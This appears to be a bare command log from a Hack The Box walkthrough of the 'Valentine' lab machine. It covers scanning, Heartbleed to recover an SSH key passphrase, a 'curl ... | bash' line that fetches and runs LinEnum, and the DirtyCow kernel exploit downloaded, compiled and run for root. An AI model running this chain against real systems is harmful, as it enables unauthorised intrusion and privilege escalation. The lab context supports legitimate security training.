echo "10.129.1.190 valentine.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.1.190 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA valentine 10.129.1.190

nmap -sU -O -p- -oA valentine-udp 10.129.1.190

Pasted image 20210304210041.png

nikto -h 10.129.1.190:80

![[Pasted image 20210304210150.png]]

gobuster dir -k -u http://valentine.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210304210355.png

Pasted image 20210304210405.png

https://0x1.gitlab.io/code/CyberChef/

wget https://10.129.1.190/dev/hype_key --no-check-certificate
cat hype_key | xxd -r -p
cat hype_key | xxd -r -p > encrypted_hype_key
openssl rsa -in encrypted_hype_key -out decrypted_hype_key
ssh -i decrypted_hype_key hype@10.129.1.190
chmod 400 encrypted_hype_key

Pasted image 20210304210558.png

git clone https://gist.github.com/10174134.git

python heartbleed.py -p 443 -n 10 10.129.1.190

Pasted image 20210304210624.png

Pasted image 20210304210634.png

Pasted image 20210304210655.png

python -m http.server 8888

curl http://10.129.1.190:8888/LinEnum.sh | bash

Pasted image 20210304210913.png

searchsploit dirty
searchsploit -m 40839
cd /dev/shm && wget http://10.129.1.190:8888/40839.c

git clone https://gist.github.com/e9d4ff65d703a9084e85fa9df083c679.git
https://github.com/FireFart/dirtycow/blob/master/dirty.c

Pasted image 20210304210955.png

hype@Valentine:/dev/shm$ gcc -pthread dc.c -o c -lcrypt
hype@Valentine:/dev/shm$ chmod +x c
hype@Valentine:/dev/shm$ ./c

Pasted image 20210304211019.png

Pasted image 20210304211025.png

hype@Valentine:/dev/shm$ su firefart
Password: test
